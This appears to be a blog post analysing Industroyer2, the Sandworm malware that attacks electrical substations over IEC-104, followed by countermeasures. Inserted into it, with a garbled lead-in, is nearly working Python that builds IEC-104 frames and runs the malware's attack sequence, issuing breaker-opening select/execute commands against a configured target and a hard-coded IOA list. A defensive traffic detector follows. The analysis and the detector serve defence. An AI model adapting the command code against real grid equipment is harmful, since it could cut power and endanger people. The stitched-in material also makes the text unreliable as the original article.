Industroyer2, the ampere strikes back

Posted date 09/02/2023
Author
INCIBE (INCIBE)

In 2016, the group of attackers known as Sandworm used a piece of malware designed to attack electrical substations, which was named Industroyer. This malware left part of Kiev without electricity in the middle of winter. Following the attack, ESET malware researcher Anton Cherepanov studied the capabilities, methods and techniques used by the malware.

- Visual summary of the attack executed by Industroyer -

Anton Cherepanov determined that Industroyer had managed to spread throughout the substation network in search of industrial control devices that speak very specific communication protocols. The malware's main objectives included disabling protective relays, opening circuit breakers and erasing the traces left by the malware itself. It is worth noting that, on the only occasion Industroyer was executed, some of its functionalities failed, so the final damage was less than intended.

In April 2022 a new attack was detected with traits similar to those of Industroyer. This is remarkable because malware targeting OT environments is rarely reused, yet here a new version of the original malware was deployed against another, similar victim. This new malware is known as Industroyer2 and is considered an update of the old one, more configurable in nature, which allows it to be tailored to new and more specific targets.

The appearance of Industroyer2 reinforces the idea that OT malware can be repurposed against different victims in the industrial space, but this has not prevented the security measures implemented in industrial systems from mitigating or stopping a large number of attacks. This was the case with Industroyer2, whose mitigation was possible thanks to the research carried out on its predecessor.

The following illustration shows the differences between the two versions. Worth highlighting are the use of a single protocol, the simplicity of the second version (a consequence of it being more specific), and the use of other malware, such as CaddyWiper, to destroy the traces and information related to Industroyer2.

- Visual comparison of the malware pieces -

In the bowels of Industroyer2

Industroyer2 is similar to its predecessor, but its scope of action is much narrower, which makes it more customizable. This allows the attack to be focused on more specific targets and to operate more efficiently.

There are major differences between the two malwares, the main ones being:

  • Industroyer2 is stand-alone and implements only the IEC 60870-5-104 (IEC-104) communications protocol. This protocol is used over TCP/IP to monitor and control RTUs, from which the substation's power system is operated.
  • Industroyer2 is considered a highly configurable piece of malware whose code base derives from the previous version. Its configuration is hard-coded in the binary and includes a list of Information Object Addresses (IOAs) that allow the attacker to change the state of the remote station elements associated with those addresses. An IOA identifies a specific data element of a device and may correspond to a power line switch, a circuit breaker or a relay state.

These new features allow the operator to set very specific configuration parameters. Some of them are shown in the following illustration:

- Industroyer2 code and parameters -

As can be seen in the picture, this new version lets the operator clearly define the target IP address, the TCP port on which the IEC-104 traffic is to be sent, the substation to attack (identified by means of an executable) and the list of information objects to which the requests are directed, through which the device values are modified.

The execution is simple. Industroyer2 first sends control-function messages (unnumbered, U-format frames in IEC-104 terms) to verify that the remote station is reachable and responds. Once communication is established, the malware sends the command that enables data transfer (STARTDT) and, after the station confirms it, the channel is available. From that point on, sending commands through the IEC-104 protocol is possible and, with it, control over the state of the digital signals of the end devices.
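The following models that exchange as an added example in Python; it is not code from the article, nor from any Industroyer2 sample. A master sends the TESTFR and STARTDT control frames, a constructed stand-in for the RTU confirms them, and the master then issues select/execute single commands (ASDU type C_SC_NA_1) against a hard-coded IOA list, which is the shape of configuration described above. The target address 192.0.2.10, common address 1 and the IOA values are assumptions; 2404/TCP is the standard IEC-104 port.

```python
"""Added example: minimal IEC 60870-5-104 framing and a simulated master/RTU exchange.
Not code from the article or from Industroyer2; addresses and IOAs are assumptions."""
import struct

START = 0x68
# U-format control functions (first byte of the APCI control field)
TESTFR_ACT, TESTFR_CON = 0x43, 0x83
STARTDT_ACT, STARTDT_CON = 0x07, 0x0B
C_SC_NA_1 = 45                      # ASDU type: single command
COT_ACTIVATION, COT_ACT_CON = 6, 7  # cause of transmission: activation / activation confirmation

# Assumed attacker configuration, in the style of the hard-coded parameters described above
TARGET_IP, TARGET_PORT = "192.0.2.10", 2404
COMMON_ADDRESS = 1
IOA_LIST = [1101, 1102, 1103]


def u_frame(func):
    """Unnumbered control frame: start byte, length 4, function code, three zero bytes."""
    return bytes([START, 4, func, 0, 0, 0])


def i_frame(ns, nr, asdu):
    """Information frame: send/receive sequence numbers are stored shifted left by one bit."""
    ctrl = struct.pack("<HH", (ns << 1) & 0xFFFE, (nr << 1) & 0xFFFE)
    return bytes([START, 4 + len(asdu)]) + ctrl + asdu


def single_command_asdu(common_addr, ioa, on, select, cot=COT_ACTIVATION):
    """C_SC_NA_1 with one information object. SCO byte: bit 0 = state, bit 7 = select (1) / execute (0)."""
    sco = (1 if on else 0) | (0x80 if select else 0)
    return (bytes([C_SC_NA_1, 1, cot, 0]) + struct.pack("<H", common_addr)
            + ioa.to_bytes(3, "little") + bytes([sco]))


def parse_apdu(data):
    """Decode an APDU into its format (U, S or I) and, for I-frames, its first information object."""
    if len(data) < 6 or data[0] != START or data[1] != len(data) - 2:
        raise ValueError("malformed APDU")
    cf1 = data[2]
    if cf1 & 0x03 == 0x03:
        return {"format": "U", "func": cf1}
    if cf1 & 0x03 == 0x01:
        return {"format": "S", "nr": struct.unpack("<H", data[4:6])[0] >> 1}
    ns, nr = (x >> 1 for x in struct.unpack("<HH", data[2:6]))
    asdu = data[6:]
    return {"format": "I", "ns": ns, "nr": nr, "type_id": asdu[0], "count": asdu[1] & 0x7F,
            "cot": asdu[2] & 0x3F, "common_addr": struct.unpack("<H", asdu[4:6])[0],
            "ioa": int.from_bytes(asdu[6:9], "little"), "element": asdu[9:]}


class FakeRTU:
    """Constructed outstation: answers control frames and acknowledges single commands."""

    def __init__(self, common_addr):
        self.common_addr, self.data_transfer = common_addr, False
        self.ns, self.nr = 0, 0
        self.points = {}               # IOA -> state, i.e. the breaker positions

    def handle(self, apdu):
        msg = parse_apdu(apdu)
        if msg["format"] == "U":
            if msg["func"] == TESTFR_ACT:
                return u_frame(TESTFR_CON)
            if msg["func"] == STARTDT_ACT:
                self.data_transfer = True
                return u_frame(STARTDT_CON)
            return None
        if msg["format"] != "I" or not self.data_transfer:
            return None                # commands before STARTDT are ignored
        self.nr = msg["ns"] + 1
        if msg["type_id"] != C_SC_NA_1 or msg["common_addr"] != self.common_addr:
            return None
        sco = msg["element"][0]
        if not sco & 0x80:             # execute: the point actually changes
            self.points[msg["ioa"]] = bool(sco & 0x01)
        reply = i_frame(self.ns, self.nr, single_command_asdu(
            self.common_addr, msg["ioa"], bool(sco & 0x01), bool(sco & 0x80), cot=COT_ACT_CON))
        self.ns += 1
        return reply


def master_sequence(rtu, common_addr, ioas, on=False):
    """Master side of the exchange; returns the RTU's resulting point states."""
    assert parse_apdu(rtu.handle(u_frame(TESTFR_ACT)))["func"] == TESTFR_CON
    assert parse_apdu(rtu.handle(u_frame(STARTDT_ACT)))["func"] == STARTDT_CON
    ns = nr = 0
    for ioa in ioas:
        for select in (True, False):   # select, then execute
            reply = rtu.handle(i_frame(ns, nr, single_command_asdu(common_addr, ioa, on, select)))
            ns += 1
            parsed = parse_apdu(reply)
            nr = parsed["ns"] + 1
            if parsed["cot"] != COT_ACT_CON:
                raise RuntimeError(f"IOA {ioa}: command not confirmed")
    return dict(rtu.points)


if __name__ == "__main__":
    print(f"target {TARGET_IP}:{TARGET_PORT}",
          master_sequence(FakeRTU(COMMON_ADDRESS), COMMON_ADDRESS, IOA_LIST))
```

Note how little the protocol itself demands: there is no authentication in IEC-104, so once STARTDT is confirmed, anyone who can reach 2404/TCP and knows the common address and IOAs can drive the outstation exactly as the legitimate master does.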

Implications of these viruses

After the attacks carried out by the Sandworm group, it can be deduced that this is only the beginning of a malware lineage whose targets will be highly critical industrial infrastructures. A successful execution of a new version of Industroyer or Industroyer2 in a production environment can disrupt vital industrial processes, whatever the specific process, since, as we have seen, the flexibility now provided by Industroyer2's configuration makes this type of malware a headache for any industrial defense team.

These industrial infrastructures, whether critical or not, need to stay at the forefront of threat intelligence and of Red Team, Blue Team and Purple Team practice, and to review the tactics and techniques that attackers employ against ICS, in order to mitigate or stop potential intrusions into their systems.

Countermeasures against Industroyer and Industroyer2

Some of the recommended countermeasures to prevent this type of attack are listed below:

  • Apply YARA rules to generate alerts whenever indicators of compromise of Industroyer or Industroyer2 are detected.
  • Deploy anomaly detection tools and firewalls throughout the network to prevent the execution or propagation of this type of malware.
  • Use inventory control and asset discovery tools in the network to keep track of the control systems and report possible attacks on each of them.
  • Implement a policy of continuous learning in which both the team in charge of the company's cyber defense and the various security devices are updated with information on new threats to their infrastructures.
  • Establish a robust cybersecurity incident response plan for the whole company infrastructure. In addition, conduct periodic Red Team exercises to test and analyze the effectiveness of the established incident response plan.

The points above are some of the recommended countermeasures; fully implementing them does not guarantee that an organization will never be affected by a cyberattack, but it greatly reduces the likelihood of critical consequences should one be perpetrated.
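As an added example of the anomaly-detection countermeasure (not code from the article), the following Python detector runs over constructed IEC-104 flow records. It decodes the ASDU type, cause of transmission and IOA of each frame sent to 2404/TCP, flags process-control commands (type IDs 45 to 51 and 58 to 64) from any host outside an assumed engineering-station allow-list, and flags a single source walking several IOAs within a short window, which is the pattern of a hard-coded IOA list being replayed. The host addresses, thresholds and sample frames are all constructed.

```python
"""Added example: allow-list and burst detection for IEC-104 control commands.
Not from the article; addresses, thresholds and sample frames are constructed."""
from collections import defaultdict

IEC104_PORT = 2404
# Type IDs for process information in the control direction (IEC 60870-5-101 type table)
CONTROL_TYPE_IDS = set(range(45, 52)) | set(range(58, 65))
ENGINEERING_STATIONS = {"10.0.0.5"}   # assumed: hosts permitted to issue commands
BURST_WINDOW_S, BURST_IOAS = 5.0, 3   # assumed: distinct IOAs per window that count as a burst


def decode_command(payload):
    """Return (type_id, cot, ioa) for an I-format APDU with one information object, else None."""
    if len(payload) < 15 or payload[0] != 0x68 or payload[2] & 0x01:
        return None                    # U- and S-frames have bit 0 of the first control byte set
    return payload[6], payload[8] & 0x3F, int.from_bytes(payload[12:15], "little")


def detect(records):
    """records: iterable of (timestamp, src_ip, dst_ip, dst_port, payload). Returns alert strings."""
    alerts, recent = [], defaultdict(list)   # recent: src -> [(ts, ioa)] inside the window
    for ts, src, dst, dport, payload in records:
        if dport != IEC104_PORT:
            continue                   # only the control direction (master -> outstation)
        decoded = decode_command(payload)
        if decoded is None or decoded[0] not in CONTROL_TYPE_IDS:
            continue
        type_id, cot, ioa = decoded
        if src not in ENGINEERING_STATIONS:
            alerts.append(f"{ts:.1f} unauthorised command type {type_id} (COT {cot}) {src} -> {dst} IOA {ioa}")
        recent[src] = [(t, i) for t, i in recent[src] if ts - t <= BURST_WINDOW_S] + [(ts, ioa)]
        if len({i for _, i in recent[src]}) == BURST_IOAS:
            alerts.append(f"{ts:.1f} command burst from {src}: {BURST_IOAS} IOAs within {BURST_WINDOW_S:.0f}s")
    return alerts


def _frame(type_id, ioa, element, cot=6, common_addr=1):
    """Constructed I-frame (sequence numbers 0) carrying one information object."""
    asdu = (bytes([type_id, 1, cot, 0, common_addr & 0xFF, common_addr >> 8])
            + ioa.to_bytes(3, "little") + bytes([element]))
    return bytes([0x68, 4 + len(asdu), 0, 0, 0, 0]) + asdu


SAMPLE_TRAFFIC = [  # constructed records, not a real capture
    (0.0, "10.0.0.5", "10.0.0.20", 2404, _frame(100, 0, 20)),          # HMI general interrogation
    (1.0, "10.0.0.5", "10.0.0.20", 2404, _frame(45, 1101, 1)),         # operator closes one breaker
    (2.0, "10.0.0.20", "10.0.0.5", 49152, _frame(1, 1101, 1, cot=3)),  # RTU reports the state back
    (10.0, "10.0.0.77", "10.0.0.20", 2404, _frame(45, 1101, 0)),       # unknown host opens breakers
    (10.2, "10.0.0.77", "10.0.0.20", 2404, _frame(45, 1102, 0)),       # one after another
    (10.4, "10.0.0.77", "10.0.0.20", 2404, _frame(45, 1103, 0)),
    (10.6, "10.0.0.77", "10.0.0.20", 2404, _frame(45, 1104, 0)),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_TRAFFIC):
        print(alert)
```

The allow-list rule is the one that matters most in a substation network: legitimate IEC-104 commands come from a handful of known masters, so any other source issuing type 45 to 51 or 58 to 64 ASDUs is worth an alert on its own, before any burst logic applies.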

Conclusion

Industrial environments are more threatened than ever, and this has only just begun. These new threats have broken the barrier between the cyber and the physical world, becoming a threat to people's lives, given the enormous consequences that a properly executed attack on these infrastructures can have.

However, not everything is catastrophic and apocalyptic: on the other side are the cybersecurity teams, analyzing this kind of malware and developing countermeasures for known attacks and even for those not yet seen. That is why it is so important for the cybersecurity teams of every company to invest time in training and learning, as well as in feeding intelligence into the various security devices deployed across the network.